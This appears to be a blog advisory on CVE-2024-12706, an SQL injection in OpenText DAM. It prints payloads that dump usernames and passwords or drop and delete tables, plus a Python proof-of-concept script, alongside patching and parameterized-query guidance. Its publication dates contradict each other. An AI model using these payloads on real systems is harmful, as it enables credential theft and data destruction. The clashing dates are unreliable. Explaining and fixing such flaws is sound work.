Published: June 2024
Severity: Critical

## Quick Summary

A major security hole — CVE-2024-12706 — has been found in all versions of OpenText™ Digital Asset Management (DAM) up to 24.4. The bug is due to improper neutralization of special elements in SQL commands, commonly called an SQL Injection vulnerability. If you are using OpenText DAM, you must act swiftly.

In plain terms: any logged-in user can make DAM’s database run SQL of their choosing. This could lead to data theft, corruption, or even full system takeover.

## What is CVE-2024-12706?

- Vulnerability Type: SQL Injection (CWE-89)
- Authentication Required: Yes

This bug is caused by missing or incorrect handling of special SQL characters in user input. When the application builds SQL commands using raw data from authenticated users (like search queries or filters) and fails to sanitize it, attackers can inject and execute arbitrary SQL commands.

## How Does the Attack Work?

Let’s imagine a search box in the DAM application for finding digital assets. In a naive implementation, the backend might build the query using something like:

```python
search_term = request.GET['query']
sql = f"SELECT * FROM assets WHERE name LIKE '%{search_term}%'"
cursor.execute(sql)
```

If the input isn’t sanitized, an attacker could submit `' OR 1=1 --` as the search term, turning the SQL into:

```sql
SELECT * FROM assets WHERE name LIKE '%' OR 1=1 -- %'
```

Other payloads in the same position let an attacker:

- Read data from other tables:

```sql
' UNION SELECT username, password, NULL FROM users --
```

- Delete tables/data:

```sql
'; DROP TABLE assets; --
```

- Create new high-privilege accounts.

---

## Real-World Exploit Example

Let’s say DAM has a form field called `assetID`, where users can fetch asset details. If vulnerable, an attacker can POST data like:

```http
POST /api/asset/details
Content-Type: application/x-www-form-urlencoded

assetID=1; DROP TABLE assets; --
```


Or, in-app, for a search/filter GET parameter:

```
https://dam.example.com/search?query='; DELETE FROM users; --
```

If the code directly interpolates the query value:

```python
query = request.GET['query']
sql = f"SELECT * FROM assets WHERE name LIKE '%{query}%'"
cursor.execute(sql)
```

Danger: the `DELETE FROM users` command is executed.

---

## Proof-of-Concept (PoC) SQL Injection Payload

Here’s a simple Python 3 script using `requests` to test a vulnerable endpoint:

```python
import requests

session = requests.Session()

# Log in first (adjust for your DAM login endpoint)
session.post('https://dam.example.com/login',
             data={'username': 'YOURUSER', 'password': 'YOURPASS'})

# Send the injection payload to the vulnerable search endpoint
payload = "' UNION SELECT 1,username,password FROM users--"
resp = session.get('https://dam.example.com/search', params={'query': payload})
print(resp.text)
```

If the output contains usernames or password hashes — *the site is vulnerable*.

---

## Who Is at Risk?

OpenText DAM customers not yet on version 24.5 or later.
If your DAM platform is publicly exposed, and you have many user accounts, *this is urgent*.

---

## How Do I Fix It?

- Patch Immediately: OpenText has released a fix in version 24.5. See the official advisory and patch instructions.
- Sanitize Inputs: All web-facing forms and API endpoints should use _prepared statements or parameterized queries_ instead of direct string concatenation.
- Review Access Control: Minimize database privileges for DAM service accounts.
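To make the remediation concrete, here is an added example (not code from OpenText or from this post) that runs the post's search pattern against an in-memory SQLite table with constructed data, once with string interpolation and once parameterized. It also escapes LIKE wildcards, a detail that parameterization alone does not cover; the table and column names are assumptions.

```python
import sqlite3

# Constructed sample data for the demo (not from the advisory or OpenText).
ASSETS = [
    (1, "logo.png", "marketing"),
    (2, "brochure.pdf", "sales"),
    (3, "logo_dark.png", "marketing"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory table shaped like the post's hypothetical `assets` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE assets (id INTEGER, name TEXT, owner TEXT)")
    conn.executemany("INSERT INTO assets VALUES (?, ?, ?)", ASSETS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """The pattern from the post: user input interpolated straight into SQL.
    A term such as ' OR 1=1 -- closes the string and rewrites the WHERE clause."""
    sql = f"SELECT * FROM assets WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def escape_like(term: str) -> str:
    """Escape LIKE metacharacters (backslash, %, _) so they match literally."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Parameterized query: the driver sends the term as a bound value, so it can
    never be parsed as SQL. The ESCAPE clause also stops callers from widening
    the search with % or _, which parameterization alone does not prevent."""
    sql = "SELECT * FROM assets WHERE name LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (f"%{escape_like(term)}%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    print("vulnerable:", len(search_vulnerable(db, payload)), "rows")  # every asset
    print("parameterized:", len(search_safe(db, payload)), "rows")     # none
    print("literal underscore:", search_safe(db, "logo_"))            # only logo_dark.png
```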

---

## Reference Links

- NVD entry for CVE-2024-12706
- OpenText Security Bulletin
- OWASP SQL Injection

---

## Conclusion

CVE-2024-12706 is a critical, confirmed SQL Injection vulnerability in a widely deployed enterprise DAM suite. If exploited, it could let internal attackers or disgruntled users wipe or steal sensitive digital assets. Don’t delay:
- Update to 24.5 or later NOW
- Audit your exposed endpoints
- Remediate with secure coding

If you work with OpenText Digital Asset Management, check your version immediately and work with IT Security to roll out the patch.

---

## Questions?
Let us know below if you need specific patching steps, or want us to analyze your DAM setup for lingering risks.

---

*Written exclusively for this post, 2024.*

## Timeline

Published on: 04/28/2025 18:15:46 UTC
Last modified on: 04/29/2025 13:52:10 UTC